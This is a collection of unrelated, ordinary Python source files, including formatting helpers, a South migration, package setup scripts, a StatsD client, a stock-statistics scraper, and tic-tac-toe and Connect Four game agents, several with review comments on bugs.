    return format_line(prefix='pwms'.rjust(RJUST), values=pwms)


def format_tmps(tmps):
    # NOTE(review): prefix 'temps' is identical to format_temps() below;
    # possibly intended to be 'tmps' -- confirm before changing output.
    return format_line(prefix='temps'.rjust(RJUST), values=tmps)


def format_names(names):
    return format_line(prefix='names'.rjust(RJUST), values=names)


def format_ports(ports):
    return format_line(prefix='ports'.rjust(RJUST), values=ports)


def format_temps(temps):
    return format_line(prefix='temps'.rjust(RJUST), values=temps)


def format_ambients(ambients):
    return format_line(prefix='ambients'.rjust(RJUST), values=ambients)


def format_limits(limits):
    return format_line(prefix='limits'.rjust(RJUST), values=limits)


def format_buffers(buffers):
    return format_line(prefix='buffers'.rjust(RJUST), values=buffers)


def format_headrooms(headrooms):
    return format_line(prefix='headrooms'.rjust(RJUST), values=headrooms)


def format_directions(directions):
    return format_line(prefix='directions'.rjust(RJUST), values=directions)


def format_differences(differences):
    return format_line(prefix='differences'.rjust(RJUST), values=differences)


def format_pwms_new(pwms_new):
    return format_line(prefix='new pwms'.rjust(RJUST), values=pwms_new)


def format_line(prefix, values):
    """Render *values* as 'prefix: [v1, v2, ...]' with aligned fields.

    Formatting per value:
    - numbers >= 1 are rounded to the nearest int,
    - numbers strictly between 0 and 1 (and negatives) keep the
      original ``str(v)[1:4].ljust(3, '0')`` treatment (e.g. 0.5 -> '.50'),
    - None renders as an empty field.
    Every field is right-justified to 6 characters.
    """
    fields = []
    for value in values:
        try:
            if value >= 1:
                value = int(round(value, 0))
            if 1 > value != 0:
                # Fractional value: drop the leading '0', pad to 3 chars.
                value = str(value)[1:4].ljust(3, '0')
        except TypeError:
            # value is None
            pass

        fields.append((str(value) if value is not None else '').rjust(6))
    # join() also fixes the original bug where an empty *values* made the
    # trailing "line[:-2]" slice eat the '[' and part of the prefix.
    return prefix + ': [' + ', '.join(fields) + ']'

# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):
    """South migration: create the api.Package table with a unique
    (name, url) pair."""

    def forwards(self, orm):
        # Adding model 'Package'
        db.create_table(u'api_package', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500, db_index=True)),
            ('url', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500)),
            ('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
        ))
        db.send_create_signal(u'api', ['Package'])

        # Adding unique constraint on 'Package', fields ['name', 'url']
        db.create_unique(u'api_package', ['name', 'url'])


    def backwards(self, orm):
        # Removing unique constraint on 'Package', fields ['name', 'url']
        # (the constraint must be dropped before the table itself)
        db.delete_unique(u'api_package', ['name', 'url'])

        # Deleting model 'Package'
        db.delete_table(u'api_package')


    # Frozen model definitions used by South's fake ORM; must mirror the
    # state of the models at the time of this migration.
    models = {
        u'api.package': {
            'Meta': {'unique_together': "(('name', 'url'),)", 'object_name': 'Package'},
            'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500', 'db_index': 'True'}),
            'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500'})
        }
    }

    complete_apps = ['api']
from __future__ import absolute_import

import matplotlib
# Force matplotlib to not use any Xwindows backend.
matplotlib.use('Agg')
import matplotlib.pyplot as plt

from plotly.tests.utils import compare_dict
from plotly.tests.test_optional.optional_utils import run_fig
from plotly.tests.test_optional.test_matplotlylib.data.annotations import *


def test_annotations():
    """Render a matplotlib figure with four corner labels and verify the
    plotly conversion matches the ANNOTATIONS fixture."""
    fig, ax = plt.subplots()
    ax.plot([1, 2, 3], 'b-')
    ax.plot([3, 2, 1], 'b-')
    # One label per corner, covering each va/ha alignment combination.
    ax.text(0.001, 0.999,
            'top-left', transform=ax.transAxes, va='top', ha='left')
    ax.text(0.001, 0.001,
            'bottom-left', transform=ax.transAxes, va='baseline', ha='left')
    ax.text(0.999, 0.999,
            'top-right', transform=ax.transAxes, va='top', ha='right')
    ax.text(0.999, 0.001,
            'bottom-right', transform=ax.transAxes, va='baseline', ha='right')
    renderer = run_fig(fig)
    # Each converted trace must match the expected data dict.
    for data_no, data_dict in enumerate(renderer.plotly_fig['data']):
        equivalent, msg = compare_dict(data_dict,
                                       ANNOTATIONS['data'][data_no])
        assert equivalent, msg
    # Each converted text label must match the expected annotation dict.
    for no, note in enumerate(renderer.plotly_fig['layout']['annotations']):
        equivalent, msg = compare_dict(note,
                                       ANNOTATIONS['layout']['annotations'][no])
        assert equivalent, msg

from distutils.core import setup

# Packaging metadata for the 'streaker' distribution.
setup(
    # Application name:
    name="streaker",

    # Version number (initial):
    version="0.0.1",

    # Application author details:
    author="Aldi Alimucaj",
    author_email="aldi.alimucaj@gmail.com",

    # Packages
    packages=["streaker"],

    # Command-line entry point installed into the user's PATH.
    scripts=['bin/streaker'],

    # Include additional files into the package
    include_package_data=True,

    # Details
    url="http://pypi.python.org/pypi/Streaker_v001/",

    #
    license="MIT",
    description="GitHub streak manipulator",

    # long_description=open("README.txt").read(),

    # Dependent packages (distributions)
    install_requires=[
        # "",
    ],
)

from __future__ import absolute_import, division, print_function, unicode_literals

# Statsd client. Loosely based on the version by Steve Ivy <steveivy@gmail.com>

import logging
import random
import socket
import time
from contextlib import contextmanager

log = logging.getLogger(__name__)


class StatsD(object):
    """Minimal UDP StatsD client (counters and timers).

    All sends are best-effort: resolution failures disable the client
    and transmission errors are logged, never raised.
    """

    def __init__(self, host='localhost', port=8125, enabled=True, prefix=''):
        """Resolve the target address (when enabled) and open a UDP socket."""
        self.addr = None
        self.enabled = enabled
        if enabled:
            self.set_address(host, port)
        self.prefix = prefix
        self.udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    def set_address(self, host, port=8125):
        """Resolve *host* and remember (ip, port); disable the client on failure."""
        try:
            self.addr = (socket.gethostbyname(host), port)
        except socket.gaierror:
            self.addr = None
            self.enabled = False

    @contextmanager
    def timed(self, stat, sample_rate=1):
        """Context manager reporting the wall-clock time of its body in ms.

        Note: nothing is reported if the body raises (no try/finally),
        matching the original behavior.
        """
        log.debug('Entering timed context for %r' % (stat,))
        start = time.time()
        yield
        duration = int((time.time() - start) * 1000)
        log.debug('Exiting timed context for %r' % (stat,))
        self.timing(stat, duration, sample_rate)

    def timing(self, stats, time, sample_rate=1):
        """
        Log timing information
        """
        unit = 'ms'
        log.debug('%r took %s %s' % (stats, time, unit))
        self.update_stats(stats, "%s|%s" % (time, unit), sample_rate)

    def increment(self, stats, sample_rate=1):
        """
        Increments one or more stats counters
        """
        self.update_stats(stats, 1, sample_rate)

    def decrement(self, stats, sample_rate=1):
        """
        Decrements one or more stats counters
        """
        self.update_stats(stats, -1, sample_rate)

    def update_stats(self, stats, delta=1, sampleRate=1):
        """
        Updates one or more stats counters by arbitrary amounts
        """
        # No-op when disabled or when address resolution failed.
        if not self.enabled or self.addr is None:
            return

        if not isinstance(stats, list):
            stats = [stats]
        data = {}
        for stat in stats:
            data["%s%s" % (self.prefix, stat)] = "%s|c" % delta

        self.send(data, sampleRate)

    def send(self, data, sample_rate):
        """Transmit *data* over UDP, probabilistically sampled below 1."""
        sampled_data = {}

        if sample_rate < 1:
            # Drop the whole batch with probability (1 - sample_rate) and
            # annotate survivors with the rate so the server can rescale.
            if random.random() <= sample_rate:
                for stat, value in data.items():
                    sampled_data[stat] = "%s|@%s" % (value, sample_rate)
        else:
            sampled_data = data

        try:
            for stat, value in sampled_data.items():
                # sendto() requires bytes on Python 3; the original sent a
                # (unicode) str, which raises TypeError there.
                payload = ("%s:%s" % (stat, value)).encode('utf-8')
                self.udp_sock.sendto(payload, self.addr)
        except Exception as e:
            log.exception('Failed to send data to the server: %r', e)


if __name__ == '__main__':
    # Manual smoke test: fire 99 counter increments at a local statsd.
    sd = StatsD()
    for i in range(1, 100):
        sd.increment('test')

from setuptools import setup, find_packages
from codecs import open
from os import path

here = path.abspath(path.dirname(__file__))

# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
    long_description = f.read()


# Packaging metadata for the 'fcit' distribution.
setup(
    name='fcit',

    # Versions should comply with PEP440.  For a discussion on single-sourcing
    # the version across setup.py and the project code, see
    # https://packaging.python.org/en/latest/single_source_version.html
    version='1.2.0',

    description='A decision-tree based conditional independence test',
    long_description=long_description,

    # The project's main homepage.
    url = 'https://github.com/kjchalup/fcit',

    # Author details
    author = 'Krzysztof Chalupka',
    author_email = 'janchatko@gmail.com',

    # Choose your license
    license='MIT',

    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        # How mature is this project? Common values are
        #   3 - Alpha
        #   4 - Beta
        #   5 - Production/Stable
        'Development Status :: 3 - Alpha',

        # Indicate who your project is intended for
        'Intended Audience :: Science/Research',
        'Topic :: Scientific/Engineering :: Artificial Intelligence',


        # Pick your license as you wish (should match "license" above)
        'License :: OSI Approved :: MIT License',

        # Specify the Python versions you support here. In particular, ensure
        # that you indicate whether you support Python 2, Python 3 or both.
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
    ],

    # What does your project relate to?
    keywords='machine learning statistics decision trees',

    # You can just specify the packages manually here if your project is
    # simple. Or you can use find_packages().
    packages=find_packages(exclude=['contrib', 'docs', 'tests']),

    # Alternatively, if you want to distribute just a my_module.py, uncomment
    # this:
    #   py_modules=["my_module"],

    # List run-time dependencies here.  These will be installed by pip when
    # your project is installed. For an analysis of "install_requires" vs pip's
    # requirements files see:
    # https://packaging.python.org/en/latest/requirements.html
    # NOTE(review): 'sklearn' is the deprecated PyPI meta-package name; the
    # canonical requirement is 'scikit-learn' -- confirm before changing.
    install_requires=['numpy', 'sklearn', 'scipy', 'joblib'],
)


import pandas as pd
import os
import time
from datetime import datetime
import re
from time import mktime
import matplotlib
import matplotlib.pyplot as plt
from matplotlib import style
style.use("dark_background")

# path = "X:/Backups/intraQuarter" # for Windows with X files :)
# if git clone'ed then use relative path,
# assuming you extracted the downloaded zip into this project's folder:
path = "intraQuarter"

def Key_Stats(gather="Total Debt/Equity (mrq)"):
  """Scrape one fundamental statistic (`gather`) from saved Yahoo Finance
  HTML snapshots under ``path``/_KeyStats, compare each stock's percent
  change since its first snapshot against the S&P 500's over the same span,
  plot the per-ticker differences, and write all rows to
  "<gather-with-punctuation-stripped>.csv".

  :param gather: label of the statistic to pull out of the key-stats table.
  """
  # NOTE(review): uses pandas APIs (DataFrame.from_csv, DataFrame.append)
  # that were deprecated/removed in modern pandas — confirm the pinned
  # pandas version before upgrading.
  statspath = path+'/_KeyStats'
  # os.walk yields (dirpath, dirnames, filenames); element 0 is the dirpath,
  # so stock_list is the list of per-ticker directories (plus statspath itself).
  stock_list = [x[0] for x in os.walk(statspath)]
  df = pd.DataFrame(
    columns = [
      'Date',
      'Unix',
      'Ticker',
      'DE Ratio',
      'Price',
      'stock_p_change',
      'SP500',
      'sp500_p_change',
      'Difference',
      'Status'
    ]
  )

  # S&P 500 index history; rows are looked up below by date string.
  sp500_df = pd.DataFrame.from_csv("YAHOO-INDEX_GSPC.csv")

  ticker_list = []

  # First entry of os.walk is statspath itself, hence [1:]; the :25 cap
  # limits the run to the first 24 ticker directories.
  for each_dir in stock_list[1:25]:
    each_file = os.listdir(each_dir)

    # ticker = each_dir.split("\\")[1] # Windows only
    # ticker = each_dir.split("/")[1] # this didn't work so do this:
    ticker = os.path.basename(os.path.normpath(each_dir))
    # print(ticker) # uncomment to verify
    ticker_list.append(ticker)

    # False doubles as "not yet seen"; the first parsed snapshot becomes the
    # baseline for the percent-change computations below.
    starting_stock_value = False
    starting_sp500_value = False

    if len(each_file) > 0:
      for file in each_file:
        # Snapshot filenames encode their capture time, e.g. 20130102133459.html
        date_stamp = datetime.strptime(file, '%Y%m%d%H%M%S.html')
        unix_time = time.mktime(date_stamp.timetuple())
        full_file_path = each_dir + '/' + file
        # NOTE(review): file handle is never closed — consider `with open(...)`.
        source = open(full_file_path,'r').read()
        try:
          # Yahoo changed its markup over time; try both table layouts.
          try:
            value = float(source.split(gather+':</td><td class="yfnc_tabledata1">')[1].split('</td>')[0])
          except:
            value = float(source.split(gather+':</td>\n<td class="yfnc_tabledata1">')[1].split('</td>')[0])

          # Look up the S&P 500 close on the snapshot date; if that date is
          # missing (weekend/holiday), retry 3 days (259200 s) earlier.
          try:
            sp500_date = datetime.fromtimestamp(unix_time).strftime('%Y-%m-%d')
            row = sp500_df[(sp500_df.index == sp500_date)]
            sp500_value = float(row['Adjusted Close'])
          except:
            sp500_date = datetime.fromtimestamp(unix_time-259200).strftime('%Y-%m-%d')
            row = sp500_df[(sp500_df.index == sp500_date)]
            sp500_value = float(row['Adjusted Close'])

          # Stock price also moved around in the markup; fall through several
          # increasingly permissive extraction strategies.
          try:
            stock_price = float(source.split('</small><big><b>')[1].split('</b></big>')[0])
          except:
            try:
              stock_price = (source.split('</small><big><b>')[1].split('</b></big>')[0])
              #print(stock_price)
              stock_price = re.search(r'(\d{1,8}\.\d{1,8})', stock_price)
              stock_price = float(stock_price.group(1))
              #print(stock_price)
            except:
              try:
                stock_price = (source.split('<span class="time_rtq_ticker">')[1].split('</span>')[0])
                #print(stock_price)
                stock_price = re.search(r'(\d{1,8}\.\d{1,8})', stock_price)
                stock_price = float(stock_price.group(1))
                #print(stock_price)
              except:
                # All extraction attempts failed; stock_price keeps its value
                # from the last failed attempt (possibly unset on first file).
                print('wtf stock price lol',ticker,file, value)
                time.sleep(5)

          if not starting_stock_value:
            starting_stock_value = stock_price

          if not starting_sp500_value:
            starting_sp500_value = sp500_value


          # Percent change from each series' first observed value.
          stock_p_change = ((stock_price - starting_stock_value) / starting_stock_value) * 100
          sp500_p_change = ((sp500_value - starting_sp500_value) / starting_sp500_value) * 100

          # NOTE(review): `location` is computed but never used.
          location = len(df['Date'])
          difference = stock_p_change-sp500_p_change
          if difference > 0:
            status = "outperform"
          else:
            status = "underperform"

          df = df.append({'Date':date_stamp,
                          'Unix':unix_time,
                          'Ticker':ticker,
                          'DE Ratio':value,
                          'Price':stock_price,
                          'stock_p_change':stock_p_change,
                          'SP500':sp500_value,
                          'sp500_p_change':sp500_p_change,
                          ############################
                          'Difference':difference,
                          'Status':status},
                         ignore_index=True)
        except Exception as e:
          # Deliberate best-effort: skip snapshots that fail to parse.
          pass
          #print(ticker,e,file, value)

  #print(ticker_list)
  #print(df)

  # One line per ticker: green if its last status is "outperform", red otherwise.
  for each_ticker in ticker_list:
    try:
      plot_df = df[(df['Ticker'] == each_ticker)]
      plot_df = plot_df.set_index(['Date'])
      if plot_df['Status'][-1] == 'underperform':
        color = 'r'
      else:
        color = 'g'
      plot_df['Difference'].plot(label=each_ticker, color=color)
      plt.legend()
    except Exception as e:
      print(str(e))

  plt.show()

  # Derive the CSV name from the statistic label, e.g.
  # "Total Debt/Equity (mrq)" -> "TotalDebtEquitymrq.csv".
  save = gather.replace(' ','').replace(')','').replace('(','').replace('/','')+str('.csv')
  print(save)
  df.to_csv(save)
    
# Guard the entry point so importing this module does not trigger the
# full scrape/plot run (previously Key_Stats() ran unconditionally).
if __name__ == "__main__":
  Key_Stats()

from __future__ import absolute_import

from .base import WhiteNoise

__version__ = '2.0.3'

__all__ = ['WhiteNoise']

import struct

# Refer to the struct docs for all the exact formats. There are many, so check
# them out before converting things yourself.
# If there's a specific offset you want to work from, use struct.pack_into and
# struct.unpack_from.
# Fixed: the original used Python 2 print statements (a SyntaxError on
# Python 3) and passed a str to struct.unpack, which requires bytes on
# Python 3.

# Integer to bytes.
i1 = 1234
print("Int to string as 8 byte little endian", repr(struct.pack("<Q", i1)))
print("Int to string as 8 byte big endian", repr(struct.pack(">Q", i1)))

# Bytes to integer. Make sure the size of the destination matches the length
# of the buffer.
s1 = b'1234'
print("String to 4 byte integer little endian", struct.unpack("<i", s1))
print("String to 4 byte integer big endian", struct.unpack(">i", s1))

# Whenever you want to convert to and from binary, think of binascii.
import binascii
h1 = binascii.b2a_hex(s1)
print("String to hex", h1)
uh1 = binascii.a2b_hex(h1)
print("Hex to string, even a binary string", uh1)

# -*- coding: utf-8 -*-

# Copyright (c) 2016 Jérémie DECOCK (http://www.jdhp.org)

# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:

# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
 
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.

"""
TODO...
"""

__all__ = ['GreedyPlayer']

import random

from jdhp.tictactoe.player.abstract import Player

class GreedyPlayer(Player):
    """Player that takes an immediately winning move when one exists,
    and otherwise plays a valid action chosen uniformly at random.
    """

    def play(self, game, state):
        """Return the action this player takes in `state` of `game`."""
        candidates = game.getSetOfValidActions(state)

        # Greedy step: return the first action that wins on the spot.
        for candidate in candidates:
            successor = game.nextState(state, candidate, self)
            if game.hasWon(self, successor):
                return candidate

        # No immediate win available: fall back to a random valid action.
        return random.choice(candidates)

__author__ = 'besta'


class BestaPlayer:
    # Connect-Four playing agent: reads a 6x7 grid from a text file and picks
    # a column by looking for 3-, then 2-, then 1-in-a-row patterns for each
    # player in turn (see decideColumn).
    # NOTE(review): changeColumnInLines/findFirstColumnEmpty use xrange, so
    # this class is Python 2 only.

    def __init__(self, fichier, player):
        # fichier: path of the text file holding the grid ('0' = empty cell).
        # player: indexable pair of player numbers; presumably
        # (own number, opponent number) — TODO confirm ordering with caller.
        self.fichier = fichier
        self.grille = self.getFirstGrid()
        self.best_hit = 0
        self.players = player

    def getFirstGrid(self):
        """
        Implements function to get the first grid.

        :return: the grid, as a list of line strings (trailing newline kept).
        """
        # NOTE(review): rows are str objects; updateGrid below assigns into
        # them with self.grille[i][j] = car, which raises TypeError on str —
        # confirm whether rows were meant to be lists.
        li = []
        with open(self.fichier, 'r') as fi:
            for line in fi.readlines():
                li.append(line)
        return li

    def updateGrid(self):
        """
        Implements function to update the grid to alter n-1
        round values

        """
        # NOTE(review): index handling looks wrong — i is reset per line but
        # incremented per character, and j is reset to 0 for every character,
        # so every write targets column 0. Likely intent: i advances per line
        # (outside the inner loop) and j per character.
        with open(self.fichier, 'r') as fi:
            for line in fi.readlines():
                i = 0
                for car in line:
                    j = 0
                    if car != '\n':
                        self.grille[i][j] = car
                        j += 1
                    i += 1

    def grilleEmpty(self):
        """
        Implement function to check if the grid is empty.

        :return: True when every cell (newline excluded) is '0'.
        """
        for line in self.grille:
            # line[:len(line) - 1] drops the trailing newline.
            for car in line[:len(line) - 1]:
                if car != '0':
                    return False
        return True

    def checkLines(self, player, inARow):
        """
        Implements function to check the current lines setup to evaluate best combination.

        :param player: check for your numbers (your player number) or those of your opponent.
        :param inARow: how many tokens in a row (3 or 2).
        :return: (True, column to play) or (False, 0)

        """
        count = 0
        # NOTE(review): unlike the diagonal checkers, flag is never reset to
        # False inside this method (nor in checkColumns) — confirm intent.
        flag = False
        for line_number, line in enumerate(self.grille):
            count = 0
            for car_pos, car in enumerate(line[:len(line) - 1]):
                if int(car) == player and not flag:
                    count = 1
                    flag = True
                elif int(car) == player and flag:
                    count += 1
                    if count == inARow:
                        # Try to extend the run on its left, then on its right.
                        if car_pos - inARow >= 0 and self.canPlayLine(line_number, car_pos - inARow):
                            return True, car_pos - inARow
                        if car_pos + 1 <= 6 and self.canPlayLine(line_number, car_pos + 1):
                            return True, car_pos + 1
                else:
                    count = 0
        return False, 0

    def canPlayLine(self, line, col):
        """
        Function to check if we can fill the line with a token.
        :param line: which line
        :param col: which column
        :return: true or false
        """
        # A cell is playable when empty and either on the bottom row (5) or
        # resting on a non-empty cell below.
        if line == 5:
            return self.grille[line][col] == '0'
        else:
            return self.grille[line][col] == '0' and self.grille[line + 1][col] != '0'

    def changeColumnInLines(self):
        """
        Implements function to transform columns in lines to make tests easier.
        :return: the transposed grid (7 strings of 6 characters)
        """
        column = []
        for x in xrange(7):
            col = ''
            for y in xrange(6):
                col += self.grille[y][x]
            column.append(col)
        return column

    def checkColumns(self, player, inARow):
        """
        Implements function to check the current columns setup to evaluate best combination.

        :param player: check for your numbers (your player number) or those of your opponent.
        :param inARow: how many tokens in a row (3 or 2).
        :return: (True, column to play) or (False, 0)

        """

        column = self.changeColumnInLines()
        count = 0
        flag = False
        for col_number, line in enumerate(column):
            count = 0
            for car_pos, car in enumerate(line):
                if int(car) == player and not flag:
                    count = 1
                    flag = True
                elif int(car) == player and flag:
                    count += 1
                    # Play on top of the vertical run if that cell is free.
                    if count == inARow and car_pos - inARow >= 0 and self.grille[car_pos - inARow][col_number] == '0':
                        return True, col_number
                else:
                    count = 0
        return False, 0

    def checkDiagonalLeftToRight(self, player, inARow):
        """
        Implements function to check the current diagonal to evaluate best combination.

        :param player: check for your numbers or opponent ones.
        :param inARow:  how many tokens in a row (3 or 2).
        :return: (True, column to play) or (False, 0)
        """

        # First pass: diagonals starting on the left edge, rows 3..5.
        x = 3
        flag = False
        while x < 6:
            count = 0
            x_int = x
            y_int = 0
            while x_int >= 0:
                if int(self.grille[x_int][y_int]) == player and not flag:
                    count = 1
                    flag = True
                elif int(self.grille[x_int][y_int]) == player and flag:
                    count += 1
                    if count == inARow and y_int + 1 <= 6 and x_int - 1 >= 0 and self.grille[x_int][y_int + 1] != '0':
                        return True, y_int + 1
                else:
                    count = 0
                    flag = False
                x_int -= 1
                y_int += 1
            x += 1

        # Second pass: diagonals starting on the bottom row, columns 1..3.
        y = 1
        flag = False
        while y <= 3:
            count = 0
            x_int = 5
            y_int = y
            while y_int <= 6 and x_int >= 0:
                if int(self.grille[x_int][y_int]) == player and not flag:
                    count = 1
                    flag = True
                elif int(self.grille[x_int][y_int]) == player and flag:
                    count += 1
                    # NOTE(review): grille[x_int][y + 1] uses the loop start y,
                    # not y_int — likely should be y_int + 1 as in the pass above.
                    if count == inARow and y_int + 1 <= 6 and x_int - 1 >= 0 and self.grille[x_int][y + 1] != '0':
                        return True, y_int + 1
                else:
                    count = 0
                    # NOTE(review): typo — assigns `flage`, so flag is never
                    # cleared here; presumably meant `flag = False`.
                    flage = False
                x_int -= 1
                y_int += 1
            y += 1

        return False, 0

    def checkDiagonalRightToLeft(self, player, inARow):
        """
        Implements function to check the current diagonal to evaluate best combination.

        :param player: check for your numbers or opponent ones.
        :param inARow:  how many tokens in a row (3 or 2).
        :return: (True, column to play) or (False, 0)
        """

        # First pass: anti-diagonals starting on the right edge, rows 3..5.
        x = 3
        flag = False
        while x < 6:
            count = 0
            x_int = x
            y_int = 6
            while x_int >= 0:
                if int(self.grille[x_int][y_int]) == player and not flag:
                    count = 1
                    flag = True
                elif int(self.grille[x_int][y_int]) == player and flag:
                    count += 1
                    if count == inARow and y_int - 1 >= 0 and x_int - 1 >= 0 and self.grille[x_int][y_int - 1] != '0':
                        return True, y_int - 1
                else:
                    count = 0
                    flag = False
                x_int -= 1
                y_int -= 1
            x += 1

        # NOTE(review): y starts at 5 but the loop condition is y <= 3 with
        # y -= 1, so this second pass never executes; the condition was
        # probably meant to be y >= 3 (mirroring the other checker).
        y = 5
        flag = False
        while y <= 3:
            count = 0
            x_int = 5
            y_int = y
            while y_int >= 3 and x_int >= 0:
                if int(self.grille[x_int][y_int]) == player and not flag:
                    count = 1
                    flag = True
                elif int(self.grille[x_int][y_int]) == player and flag:
                    count += 1
                    # NOTE(review): grille[x_int][y - 1] uses the loop start y,
                    # not y_int — likely should be y_int - 1.
                    if count == inARow and y_int - 1 >= 0 and x_int - 1 >= 0 and self.grille[x_int][y - 1] != '0':
                        return True, y_int - 1
                else:
                    count = 0
                    # NOTE(review): same `flage` typo as above.
                    flage = False
                x_int -= 1
                y_int -= 1
            y -= 1

        return False, 0

    def checkDiagonals(self, player, inARow):
        """
        Calls two diagonal functional.
        :return: an int, representing the column where to play or 0 and False if there is no pattern search.
        """
        check = self.checkDiagonalLeftToRight(player, inARow)
        if check[0]:
            return check
        else:
            return self.checkDiagonalRightToLeft(player, inARow)

    def playSomeColumn(self, player, inARow):
        """
        Call all function for a player and a number of tokens given.
        :param player: which player
        :param inARow: how many token
        :return: true or false (col number if true)
        """
        # Dict iteration order decides which check wins first when several match.
        methods = {'checklines': self.checkLines, 'checkcolumn': self.checkColumns, 'checkdiagonal': self.checkDiagonals}
        for key, function in methods.items():
            which_col = function(player, inARow)
            if which_col[0]:
                return which_col
        return False, 0

    def findFirstColumnEmpty(self):
        """
        Implements function to get the first column where a slot remain.
        :return: the column, or -1 when the grid is full
        """
        for col in xrange(7):
            if self.grille[0][col] == '0':
                return col
        return -1

    def decideColumn(self):
        """
        Implements main function : to decide what is the better hit to do.

        :return: an int, representing the column where we play
        """
        # Opening move: take the centre column.
        if self.grilleEmpty():
            return 3

        # Look for the longest completable run first (3, then 2, then 1),
        # for ourselves then for the opponent, in that order.
        li_sequence = [3, 2, 1]
        li_players = [self.players[0], self.players[1]]
        for sequence in li_sequence:
            for player in li_players:
                choosen_col = self.playSomeColumn(player, sequence)
                if choosen_col[0]:
                    return choosen_col[1]

        # Nothing matched: fall back to the leftmost playable column.
        return self.findFirstColumnEmpty()

# User info wrapper object
import logging

class User(object):
    """
    Wrapper object around an entry in users.json. Behaves like a read-only dictionary if
    asked, but adds some useful logic to decouple the front end from the JSON structure.
    """

    _NAME_KEYS = ["display_name", "real_name"]
    _DEFAULT_IMAGE_KEY = "image_512"

    def __init__(self, raw_data):
        # Keep the raw users.json entry untouched; all accessors read from it.
        self._raw = raw_data

    def __getitem__(self, key):
        # Dictionary-style read-only access to the underlying entry.
        return self._raw[key]

    @property
    def display_name(self):
        """
        Find the most appropriate display name for a user: look for a "display_name", then
        a "real_name", and finally fall back to the always-present "name".
        """
        for name_key in self._NAME_KEYS:
            # Prefer the top-level value; fall back to the profile section.
            top_level = self._raw.get(name_key)
            if top_level:
                return top_level
            if "profile" in self._raw and self._raw["profile"].get(name_key):
                return self._raw["profile"][name_key]
        return self._raw["name"]

    @property
    def email(self):
        """
        Shortcut property for finding the e-mail address or bot URL.
        """
        if "profile" in self._raw:
            address = self._raw["profile"].get("email")
        else:
            # Bots have no profile; their URL stands in for an address.
            address = self._raw.get("bot_url")
        if not address:
            logging.debug("No email found for %s", self._raw.get("name"))
        return address

    def image_url(self, pixel_size=None):
        """
        Get the URL for the user icon in the desired pixel size, if it exists. If no
        size is supplied, give the URL for the full-size image.
        """
        if "profile" not in self._raw:
            return None
        profile = self._raw["profile"]
        if pixel_size:
            sized_key = "image_%s" % pixel_size
            if sized_key in profile:
                return profile[sized_key]
        # Unknown or missing size: serve the full-size image.
        return profile[self._DEFAULT_IMAGE_KEY]


def deleted_user(id):
    """
    Create a User object standing in for a deleted user account.
    """
    # Synthesize a minimal users.json-shaped entry for the missing account.
    placeholder = dict(
        id=id,
        name="deleted-" + id,
        deleted=True,
        is_bot=False,
        is_app_user=False,
    )
    return User(placeholder)

#!/hpf/largeprojects/ccmbio/naumenko/tools/bcbio/anaconda/bin/python

"""
Looks for a specific sample
"""

import re
import sys
import os
import os.path

def main():
    """Check that a sample's report and BAM exist and print a summary line.

    Usage: <script> <family>_<sample>. Reports are expected under
    "<family_id // 100>x/<family>" (e.g. family 1234 -> "12x/1234").
    Prints "<sample>\t<report dir>\t<bam path>" when both files exist,
    otherwise "<sample>\t<error list>".

    Fixes: the original mixed tabs and spaces (a TabError on Python 3),
    matched the family with r'\d*' (which always matches, making the
    "not starting with digital" branch unreachable and int('') crash
    instead), and relied on Python 2 integer division for the prefix.
    """
    sample = sys.argv[1]
    family, sample_only = sample.split("_")

    # Require at least one leading digit; r'\d*' would match the empty string.
    match = re.match(r'\d+', family)
    if not match:
        print("Family ID is not starting with digital")
        return

    # Floor-divide to keep the historical "12x" style prefix (family 1234 -> 12).
    prefix = str(int(match.group(0)) // 100)
    report_path = prefix + 'x/' + family

    errors = []

    report = os.path.isfile(report_path + '/' + family + '.csv')
    if not report:
        errors.append('Error: no report')

    bam = os.path.isfile(report_path + '/' + sample + '.bam')
    if not bam:
        errors.append(' ERROR: no bam')

    if bam and report:
        print(sample + '\t' + os.getcwd() + "/" + report_path + "\t" + os.getcwd() + "/" + report_path + '/' + sample + '.bam')
    else:
        print(sample + '\t' + ' '.join(errors))


if __name__ == '__main__':
    main()

# -*- coding: utf-8 -*-
"""
Date: 2/2/2017

Team: Satoshi Nakamoto
@Authors: Alex Levering and Hector Muro

Non-standard dependencies:
* Twython
* NLTK
* Folium
* Geocoder
* psycopg2

TO DO BEFOREHAND:
The following steps are non-automatable and have to be performed manually.
* Have the NLTK vader lexicon locally (nltk.download("vader_lexicon"))
* Have PostGIS installed on PostgreSQL
* Set the file paths specified below to wherever your folder is
* Upgrade folium to the latest version (0.2.1)
"""

